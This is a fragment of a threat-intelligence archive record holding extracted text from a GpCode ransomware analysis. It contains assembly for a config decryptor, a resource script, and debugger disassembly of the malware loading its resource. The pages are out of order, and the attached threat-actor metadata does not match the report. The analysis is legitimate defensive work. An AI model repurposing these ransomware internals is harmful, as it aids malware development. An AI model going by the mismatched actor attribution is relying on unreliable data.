EDX,EDX\r\n@gpcode_0040175C:\r\n        LODS BYTE PTR DS:[ESI]\r\n        XOR AL,BYTE PTR DS:[EDX+buffer2]\r\n        STOS BYTE PTR ES:[EDI]\r\n        INC EDX\r\n        DEC ECX\r\n        JNZ @gpcode_00401755\r\n        POPAD\r\n    RET\r\ndecrypt endp\r\nend start\r\nResource file:\r\n;This Resource Script was generated by WinAsm Studio.\r\n#define IDC_OK 1003\r\n#define IDC_CANCEL 1004\r\n1 RCDATA DISCARDABLE \"gpcode.data\" ;this is your cfg file ripped from GpCode\r\n101 DIALOGEX 0,0,294,170\r\nCAPTION \"GpCode...\"\r\nFONT 8,\"Tahoma\"\r\nSTYLE 0x80c80880\r\nEXSTYLE 0x00000000\r\nBEGIN\r\n    CONTROL \"Read RC_DATA \u003e cfg\",IDC_OK,\"Button\",0x10000001,3,135,287,14,0x00000000\r\n    CONTROL \"Quit\",IDC_CANCEL,\"Button\",0x10000000,3,154,287,14,0x00000000\r\n    CONTROL \"\",1002,\"Edit\",0x10200044,3,3,287,130,0x00000200\r\nEND\r\nhttp://www.xylibox.com/2011/01/gpcode-ransomware-2010-simple-analysis.html\r\nPage 17 of 18\n\nEtt fel inträffade.\r\nDet går inte att köra JavaScript.\r\nSource: http://www.xylibox.com/2011/01/gpcode-ransomware-2010-simple-analysis.html\r\nhttp://www.xylibox.com/2011/01/gpcode-ransomware-2010-simple-analysis.html\r\nPage 18 of 18\n\n00401610 |. E8 C9040000 00401615 |. 0BC0 CALL 00401ADE OR EAX,EAX ; \\SizeofResource\n00401617 |. 75 04 JNZ SHORT 0040161D ; GpCode.0040161D \n00401619 |. 33C0 XOR EAX,EAX  \n0040161B |. C9 LEAVE  \n0040161C |. C3 RETN  \nHere it grabs the size of the resource, eax will contain 0000055D (1373)\nNote: The screenshot of resource hacker also indicate the size. \nWhen it's done, it gets free memory by GlobalAlloc (at eax: 00175158) \nWith the specified size: 55D  \n00401646 |. FF75 F0 PUSH DWORD PTR SS:[EBP-10] ; /MemSize\n00401649 |. 6A 40 PUSH 40 ; |Flags = GPTR\n0040164B |. E8 52040000 CALL 00401AA2 ; \\GlobalAlloc\n00401650 |. 0BC0 OR EAX,EAX  \nThen, it does a copy to the following memory (00175158) \n0040165D |. FF75 F0 PUSH DWORD PTR SS:[EBP-10] ; /Length = 55D (1373.)\n00401660 |. FF75 FC PUSH DWORD PTR SS:[EBP-4] ; |Source = GpCode.0040F474\n00401663 |. FF75 EC PUSH DWORD PTR SS:[EBP-14] ; |Destination = 00175158\n00401666 |. E8 61040000 CALL 00401ACC ; \\RtlMoveMemory\n0040166B |. FF75 F8 PUSH DWORD PTR SS:[EBP-8] ; /hResource = 0040F474\n0040166E |. E8 11040000 CALL 00401A84 ; \\FreeResource\n00401673 |. 8B5D EC MOV EBX,DWORD PTR SS:[EBP-14] \n00401676 |. 6A 10 PUSH 10 ; /Length = 10 (16.)\n00401678 |. 53 PUSH EBX ; |Source = 00175158\n00401679 |. 68 70444000 PUSH 404470 ; |Destination = GpCode.00404470\n0040167E |. E8 49040000 CALL 00401ACC ; \\RtlMoveMemory\nJust after doing this, it goes to another call  \n  Page 3 of 18",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"http://www.xylibox.com/2011/01/gpcode-ransomware-2010-simple-analysis.html"
	],
	"report_names": [
		"gpcode-ransomware-2010-simple-analysis.html"
	],
	"threat_actors": [
		{
			"id": "2864e40a-f233-4618-ac61-b03760a41cbb",
			"created_at": "2023-12-01T02:02:34.272108Z",
			"updated_at": "2026-04-10T02:00:04.97558Z",
			"deleted_at": null,
			"main_name": "WildCard",
			"aliases": [],
			"source_name": "ETDA:WildCard",
			"tools": [
				"RustDown",
				"SysJoker"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "256a6a2d-e8a2-4497-b399-628a7fad4b3e",
			"created_at": "2023-11-30T02:00:07.299845Z",
			"updated_at": "2026-04-10T02:00:03.484788Z",
			"deleted_at": null,
			"main_name": "WildCard",
			"aliases": [],
			"source_name": "MISPGALAXY:WildCard",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775438968,
	"ts_updated_at": 1775792121,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f9a69181f77341e01f90c7e194451bcc97779044.pdf",
		"text": "https://archive.orkl.eu/f9a69181f77341e01f90c7e194451bcc97779044.txt",
		"img": "https://archive.orkl.eu/f9a69181f77341e01f90c7e194451bcc97779044.jpg"
	}
}